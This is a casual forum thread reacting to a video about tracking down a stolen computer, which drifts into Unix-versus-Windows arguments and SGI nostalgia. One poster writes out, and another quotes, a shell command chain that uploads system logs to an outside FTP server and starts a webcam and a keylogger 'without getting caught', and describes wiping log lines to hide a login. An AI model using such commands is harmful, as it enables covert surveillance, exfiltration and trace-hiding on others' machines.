What Happens When You Steal A Hacker's Computer

[Clarkie]

I found this humerous and I thought I'd post a link for you.

http://www.youtube.com/watch?v=U4oB28ksiIo

Sorry if it's been previously posted?

 

[MoodyBlues]

That was great.

 

[brad-short]

Great post, that guy is a Ledge! Bet the dood just bought it off someone tho! lol

 

[HKM]

LOL enjoyed this... even when I am blacklisted the old era brings me back good ol memories.

 

[Njcellgeek74]

Love it! That guy is awesome!

 

[mrspeedmaster]

Great video...

Thats exactly the reason why I run:

Mac OSX
Linux
AIX
Solaris
BSD
and of course, my all time favorite.. IRIX 6.5

You can never do that with Windows.

 

[r0ckstarr]

That was great! Thanks for posting this.

 

[HKM]

Great video...

Thats exactly the reason why I run:

Mac OSX
Linux
AIX
Solaris
BSD
and of course, my all time favorite.. IRIX 6.5

You can never do that with Windows.

Who told you that you can't do that with Windows? Far as naming few OS goes that doesn't impress anyone as it means nothing. I been using *nix for close to 12+ years now, matter of fact people use to call me "hack" but that subject I'm not getting into as I'm blacklisted now.

Been using *nix for past 11+ years here.

Linux: Slackware, SuSE, Debian
Unix: BSD, Solaris, AIX

lol @ Ubuntu and Kurbuntu BS, pure Opt Lynx for life.

 

[MoodyBlues]

Great video...

Thats exactly the reason why I run:

Mac OSX
Linux
AIX
Solaris
BSD
and of course, my all time favorite.. IRIX 6.5

You can never do that with Windows.

I agree. Although, to be fair, I don't know what windoze can or cannot do at this point as I haven't had the misfortune of touching it in a long time. When I purchased one of my most recent computers I actually booted it up to see what Vista was all about. After a few minutes--during which time I was idiot-prompted a million times--I didn't CARE and quickly rebooted, wiped the drive, and installed Linux.

Considering that *nix started from the ground up as a multi-user, multi-tasking, multi-location, networked OS with security at its forefront, it's kind of a no-brainer that windoze will never compare.

 

[mrspeedmaster]

Who told you that you can't do that with Windows?

Get back to me when I can SSH into my Windows box from a 5 year old MOBILE phone and run a command like this without even getting caught from suspect:

tar -c /var/log/system.log | gzip > /tmp/syslog.tgz; ftp -u ftp://me:mypass@ftp.myftp.com/ - `date +%m%d%H%M`.tgz syslog.tgz; /tmp/syslog.tgz ; /etc/init.d/web-cam start; /etc/init.d/keylogger restart -o /tmp/log_this_****er_keyoutputfile.txt

TARS a folder, gzip, uploads to a server w/ timestamp infile name, deletes the temp tgz file in,Start my usb camera service, and start my keylogger in ONE swoop .

NO GUI can do this in one execution from one app w/ one click

I can even get more complicated.

In one command line you can zip up all the log files you want, you can add new host rules, start daemon processes (e.g. camera frame grabber), add a keylogger, AWK the relevant log records you need, open a port, upload your data, and most importantly,most importantly, delete the last few lines of the system log files to delete any trace you were logged into the system

Windows Server has some DOS powertool commands. There are also cgywin (but you are basically running a POSIX emulation layer). You are pretty much reliant on the Windows GUI which can lead you to getting caught by your suspect.

But in order to do what i gave an example of, you'd literally need to VNC/RDP in.

Even if you get a CLI console access, you have to rely on apps that gave CLI equivalents like creating a thumbnail snapshot from the built in camera.

For 99% of Windows users and even Windows Admins, you have to do most of that through a GUI. If you wanted to install software to do something, most likely it will leave visible traces such as new apps icons on the start menu, icons on the desktop, registry entries,etc..

In UNIX, adding a keylogger and usb web camera daemon are command line daemon process executables.

With UNIX, it is much more powerful and elegant to do it in the CLI. You can install keyloggers, create open ports using IPFW rules and do all the stuff MUCH easier in UNIX. I wonder, can you even console in a Windows box and delete registry entries that showed any trace of your login?
The fact you can do this with any terminal client makes it even more powerful. You can do this with a smartphone, an iPad, PDA.. I remotely login into my home computer with 5 year cell phones all the time. Try using RDP to a Windows machine with a small 3.2 phone screen isn't very practical.


Notice how I said much easier in UNIX. It is easier because you don't need a GUI app, a setup.exe or even a vbscript to do what is done in that video.

 

[mikedt]

Great video...

Thats exactly the reason why I run:

Mac OSX
Linux
AIX
Solaris
BSD
and of course, my all time favorite.. IRIX 6.5

You can never do that with Windows.

Do you have an SGI MIPS workstation or something? Similar with whatever hardware AIX runs on, an old PS/2 or IBM mainframe?

SGI is ceasing MIPS IRIX isen't it, in favour of Linux running on x86 hardware.
http://www.sgi.com/support/services/irix_mips_support.html

 

[mrspeedmaster]

Do you have an SGI MIPS workstation or something? Similar with whatever hardware AIX runs on, an old PS/2 or IBM mainframe?

SGI is ceasing MIPS IRIX isen't it, in favour of Linux running on x86 hardware.
SGI - Services & Support: SGI Support of MIPS IRIX Products Continues to December 2013

Irix is dead, abandonware. I run it for nostalgic reasons.

I have a SGI O2 and an INDY workstation from previous jobs.
I also have some rare SGI NT rack servers. Back in the dot-com days, I had a beautiful SGI Indy setup w/ the ultrawide SGI LCD 19". My workstation was like $8,000 and it was awesome. I miss those days.

Irix is the most beautiful OS there is.
Indigo Magic Desktop blows everything away. Vector based icons that were fully scaleable.
The User interface was gorgeous.
Somebody should make a clone of Magic Desktop as a windows manager for Linux.


I run AIX via a server. Basically just SSH into client's servers.

I'm trying to get A/UX running now. Apple's first UNIX for Motoroloa 68000 cpus like the old Mac Plus.
That is more of a hobby though; running vintage OSes.

 

[mikedt]

Irix is the most beautiful OS there is.
Indigo Magic Desktop blows everything away. Vector based icons that were fully scaleable.
The User interface was gorgeous.
Somebody should make a clone of Magic Desktop as a windows manager for Linux.

MaXX Interactive Desktop Community Edition
This sure looks very similar to SGI's Magic Desktop.

 

[mrspeedmaster]

MaXX Interactive Desktop Community Edition
This sure looks very similar to SGI's Magic Desktop.

That project has been inactive for about 2 years now. Not much activity.

I really miss SGI. Awesome hardware.
Servers that could go up to 512 CPUs, 1TB of RAM back in the early 2000s.

They had chassis where you could pull out RAM, add CPUs on live running systems without re-booting using NUMALINK bricks.
Incredible technology that is 15-20 years ahead of its time.

I don't even think you can do that with Linux & x86/x64 Intel CISC architecture. They were literally, true super computers.
Unfortunately, Intel CISC is cheaper and LINUX is free that lead to SGI's death.

XFS filesystem was its trump card over Solaris/AIX. We had some good flame wars back then. Irix vs Solaris.

 

[Snow_Fox]

Um... while it is cool to be able to do all of that..

doesn't it also equate to a boat load of security holes in systems outside of windows?

I am trying to create a keylogger for windows right now and its complex.

*NOTE*

I am an enrolled CMPS Major at a university and we are doing this as the project we picked.

I am really worried about grabbing people's FB passwords for petty vengeance or stealing people's identities..

We just had to pick a project and it seemed different.

 

[mrspeedmaster]

Um... while it is cool to be able to do all of that..

doesn't it also equate to a boat load of security holes in systems outside of windows?

Not in the context of this video.

It is not a security hole whatsoever if you are the Administrator, ROOT, SuperUser of your own machine.

You should be able to run whatever you want. The guy's machine was stolen and he simply used common sense things to get his machine back. I would have done things differently.

It wasn't really hacking. The guy was just funny w/ his Southern and Australian accent. The commentary is what made the video funny.

In fact, it is all junior level-sysadmin stuff.

 

[Snow_Fox]

Oh don't mistake me I am very familiar with all the terminology and how he did it and just thought "oh god if I ever have something stolen, I hope I am that lucky."

But, I was more commenting on your ability to do everything you stated above from a mobile phone..

You said you could do it all from one command.. and I could be wrong as I am not extremely familiar with command prompt as I would like to be.. But, I saw no commands dictating super user/root/admin status which (I suppose I'm stupid) could be taken to mean you could hypothetically do it from any 5 year old mobile phone and root was not required meaning if someone were capable of figuring out one or two details your entire system is compromised.

You have to understand I have minimal experience in linux (although I do love using it when I can)

 

[mrspeedmaster]

Oh don't mistake me I am very familiar with all the terminology and how he did it and just thought "oh god if I ever have something stolen, I hope I am that lucky."

But, I was more commenting on your ability to do everything you stated above from a mobile phone..
You have to understand I have minimal experience in linux (although I do love using it when I can)

When you log in, you can log in as root.

ssh root@mycomputer.dyndns.org

or you elevate yourself to root

ssh user@mycomputer.dyndns.org
then you elevate yourself to root by
# sudo -s
or
# su

Once you are root, you can do whatever.
You can run multiple commands by daisy chaining with ";"
E.G.

more logs | grep 'find entry' > /tmp/find.txt;cp /tmp/find.txt /volumes/copy; rm /tmp/find.txt

With one line, I ran 3 commands in sequence. Basically, daisy chaining your commands.
I first scanned a log file w/ a keyword. Piped it to a temp file. Then I copied the temp file to a new location and lastly, I removed the temp file. I didn't have to interact with it after I executed it.

You can do this from an Android phone or an iPhone.
I use an Incredible w/ Connectbot and with the middle trackpad, it is like using a regular console for me.

Of course with a phone, you'd probably want to type out your commands in a text editor/notepad then copy-n-paste them into your shell to minimize mistakes. Or, type it out as a bash script on your phone and just scp the script (which has all your commands in sequences) to the host and run the scp file.

Edit: BTW, there has been SSH terminal clients on Nokia Symbian/Windows Machines as far back as 8 years. I've been doing this stuff off WinMo phones since 1994. Phones like the CIngular 2125, Blackjack, HTC Touch Pro,etc....connecting to my OSX machine.
No rooting required. You just need a good terminal emulator to console into your host. Command line will be more efficient, reliable over slow cellular connections versus running something like VNC.

Dont get me started on what you can do w. an iPad. Remote X11.

 

[ipodman]

Had me laughing, great Vid.

 

[Bob Cat]

Get back to me when I can SSH into my Windows box from a 5 year old MOBILE phone and run a command like this without even getting caught from suspect:

tar -c /var/log/system.log | gzip > /tmp/syslog.tgz; ftp -u ftp://me:mypass@ftp.myftp.com/ - `date +%m%d%H%M`.tgz syslog.tgz; /tmp/syslog.tgz ; /etc/init.d/web-cam start; /etc/init.d/keylogger restart -o /tmp/log_this_****er_keyoutputfile.txt

TARS a folder, gzip, uploads to a server w/ timestamp infile name, deletes the temp tgz file in,Start my usb camera service, and start my keylogger in ONE swoop .

NO GUI can do this in one execution from one app w/ one click

I can even get more complicated.

In one command line you can zip up all the log files you want, you can add new host rules, start daemon processes (e.g. camera frame grabber), add a keylogger, AWK the relevant log records you need, open a port, upload your data, and most importantly,most importantly, delete the last few lines of the system log files to delete any trace you were logged into the system

Windows Server has some DOS powertool commands. There are also cgywin (but you are basically running a POSIX emulation layer). You are pretty much reliant on the Windows GUI which can lead you to getting caught by your suspect.

But in order to do what i gave an example of, you'd literally need to VNC/RDP in.

Even if you get a CLI console access, you have to rely on apps that gave CLI equivalents like creating a thumbnail snapshot from the built in camera.

For 99% of Windows users and even Windows Admins, you have to do most of that through a GUI. If you wanted to install software to do something, most likely it will leave visible traces such as new apps icons on the start menu, icons on the desktop, registry entries,etc..

In UNIX, adding a keylogger and usb web camera daemon are command line daemon process executables.

With UNIX, it is much more powerful and elegant to do it in the CLI. You can install keyloggers, create open ports using IPFW rules and do all the stuff MUCH easier in UNIX. I wonder, can you even console in a Windows box and delete registry entries that showed any trace of your login?
The fact you can do this with any terminal client makes it even more powerful. You can do this with a smartphone, an iPad, PDA.. I remotely login into my home computer with 5 year cell phones all the time. Try using RDP to a Windows machine with a small 3.2 phone screen isn't very practical.


Notice how I said much easier in UNIX. It is easier because you don't need a GUI app, a setup.exe or even a vbscript to do what is done in that video.

Whew my head hurts after that.